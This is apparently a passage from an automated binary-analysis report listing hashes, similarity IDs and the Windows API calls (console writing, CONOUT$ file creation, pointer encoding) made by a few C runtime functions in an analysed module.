                • Opcode Fuzzy Hash: e9e8a88f779a4c5ede003a32aa79a75e6d8b8cdeab1903a1e24b7626ede81452
                • Instruction Fuzzy Hash: 511108B66076057E7B5157B9DE88C6F296DEE962A83200115FA00D12C1FB24DE134BB5
                APIs
                • WriteConsoleW.KERNEL32(00000000,00000000,6F9ED16B,00000000,00000000,?,6F9F85E1,00000000,00000001,?,?,?,6F9F29D8,?,00000000,00000000), ref: 6F9F9F64
                • GetLastError.KERNEL32(?,6F9F85E1,00000000,00000001,?,?,?,6F9F29D8,?,00000000,00000000,?,?,?,6F9F2FB2,00000000), ref: 6F9F9F70
                  • Part of subcall function 6F9F9F36: CloseHandle.KERNEL32(FFFFFFFE,6F9F9F80,?,6F9F85E1,00000000,00000001,?,?,?,6F9F29D8,?,00000000,00000000,?,?), ref: 6F9F9F46
                • ___initconout.LIBCMT ref: 6F9F9F80
                  • Part of subcall function 6F9F9EF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F9F9F27,6F9F85CE,?,?,6F9F29D8,?,00000000,00000000,?), ref: 6F9F9F0B
                • WriteConsoleW.KERNEL32(00000000,00000000,6F9ED16B,00000000,?,6F9F85E1,00000000,00000001,?,?,?,6F9F29D8,?,00000000,00000000,?), ref: 6F9F9F95
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: a3185bcd108a9e4d421ec96081c44ad1292f464412ca5220d84a850510d6eeab
                • Instruction ID: f02eda1bff6fab2506e83819a3bef85ab0c1b282b33a23b8586a95b42d3c2165
                • Opcode Fuzzy Hash: a3185bcd108a9e4d421ec96081c44ad1292f464412ca5220d84a850510d6eeab
                • Instruction Fuzzy Hash: 34F0AC3A506615BBDF221F96DC0898A3F66EF0A3B5B144015FA19952A0C632DC72DB91
                APIs
                • RtlEncodePointer.KERNEL32(00000000,?), ref: 6F9E6EA4
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: b7ea80372e2aa32d0d273a24b643d8687a009bf4028ca506816135a60a3a3e41
                • Instruction ID: 628870d77b54a97706c25ce2e8683fb909baf9682ac22778a50da2ed3dd7031c
                • Opcode Fuzzy Hash: b7ea80372e2aa32d0d273a24b643d8687a009bf4028ca506816135a60a3a3e41
                • Instruction Fuzzy Hash: 1F415871910209AFDF06CF94C880AEE7BB9BF4A304F148499FA18AA291D335E960DB51